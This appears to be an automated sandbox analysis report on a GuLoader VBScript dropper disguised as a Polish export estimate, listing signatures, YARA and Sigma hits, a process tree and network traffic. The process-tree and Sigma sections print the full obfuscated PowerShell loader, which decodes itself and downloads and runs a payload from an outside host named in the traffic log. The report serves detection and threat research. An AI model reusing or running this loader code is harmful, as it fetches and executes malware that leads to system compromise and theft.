
Windows Analysis Report
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

Overview

General Information

Sample name: Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
Analysis ID: 1541193
MD5: 740d51a6d22d43f1b99e61c9d3366237
SHA1: 712c28e59ff11135e1957f86d8e6a995ad772de6
SHA256: e301c6308fff6e0e1d3e399a2ad2eb623f2f36590ff60766d16efbe6f4c154dc
Tags: vbs, user-Maciej8910871

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7468 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7544 cmdline: ping Horm5zl_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u 
';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' 
FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. 
nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7852 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u 
';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' 
FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. 
nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Process Memory Space: powershell.exe PID: 7608 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
              Source | Rule | Description | Author | Strings
              amsi64_7608.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
              amsi64_7608.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
              • 0xfc8d:$b2: ::FromBase64String(
              • 0xd055:$s1: -join
              • 0x6801:$s4: +=
              • 0x68c3:$s4: +=
              • 0xaaea:$s4: +=
              • 0xcc07:$s4: +=
              • 0xcef1:$s4: +=
              • 0xd037:$s4: +=
              • 0xe82b:$s4: +=
              • 0xe8ab:$s4: +=
              • 0xe971:$s4: +=
              • 0xe9f1:$s4: +=
              • 0xebc7:$s4: +=
              • 0xec4b:$s4: +=
              • 0xf462:$e4: Get-WmiObject
              • 0xf651:$e4: Get-Process
              • 0xf6a9:$e4: Start-Process
              amsi32_7852.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
              • 0xe00d:$b2: ::FromBase64String(
              • 0xb4a1:$s1: -join
              • 0x4c4d:$s4: +=
              • 0x4d0f:$s4: +=
              • 0x8f36:$s4: +=
              • 0xb053:$s4: +=
              • 0xb33d:$s4: +=
              • 0xb483:$s4: +=
              • 0xcc77:$s4: +=
              • 0xccf7:$s4: +=
              • 0xcdbd:$s4: +=
              • 0xce3d:$s4: +=
              • 0xd013:$s4: +=
              • 0xd097:$s4: +=
              • 0xd8ae:$e4: Get-WmiObject
              • 0xda9d:$e4: Get-Process
              • 0xdaf5:$e4: Start-Process
              • 0x16225:$e4: Get-Process

              System Summary

              Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", ProcessId: 7468, ProcessName: wscript.exe
              Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", ProcessId: 7468, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud 
';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnH
              No Suricata rule has matched

              AV Detection

              Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.3% probability
              Source: unknown; HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2
              Source: Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global traffic; HTTP traffic detected: GET /Bennington.jpb HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: deseuri-romania.ro | Connection: Keep-Alive
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic; HTTP traffic detected: GET /Bennington.jpb HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: deseuri-romania.ro | Connection: Keep-Alive
              Source: global traffic; DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e
              Source: global traffic; DNS traffic detected: DNS query: deseuri-romania.ro
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://deseuri-romania.ro
